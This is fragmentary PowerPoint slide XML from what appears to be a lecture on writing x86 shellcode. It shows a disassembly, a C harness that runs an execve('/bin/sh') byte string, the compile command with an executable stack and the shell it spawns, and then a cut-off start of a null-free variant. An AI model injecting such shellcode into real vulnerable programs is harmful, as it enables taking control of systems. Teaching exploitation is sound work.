            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>80483a7:       53                      push   %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>80483a8:       89 e1                   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>    %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>,%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>80483aa:       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 00 00 00 00          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>    $0x0,%edx </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>80483af:       cd 80                   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>    $0x80 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>80483b1:       b8 01 00 00 00          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>    $0x1,%eax </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>80483b6:       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>bb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 00 00 00 00          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>    $0x0,%ebx </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>80483bb:       cd 80                   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>    $0x80</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FCFB7E3C-6220-8942-988C-3F6E25750AD7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>201</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="73711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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Testing the Shell Code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="545795" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B00040"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> = "\xb8\x0b\x00\x00\x00\x68\x2f\x73"                                </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>                   "\x68\x00\x68\x2f\x62\x69\x6e\x89"                     </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>                   "\xe3\x6a\x00\x53\x89\xe1\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>xba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>\x00"                     </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>                   "\x00\x00\x00\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>xcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>\x80\xb8\x01\x00"                     </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>                   "\x00\x00\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>xbb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>\x00\x00\x00\x00\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>xcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>"	                 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>                   "\x80";</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> (*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>)();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  shell=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  shell();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> -m32 -z </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>execstack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>test_shellcode.c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$ ./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>a.out</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>sh-4.1$</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="79965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5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5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57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57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57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57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579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4579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4579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4579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4579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45795">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45795">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45795">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4579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Null No Newline </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600201"/>
            <a:ext cx="8229600" cy="4756151"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="55000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>.text</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>globl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>main</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>:	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
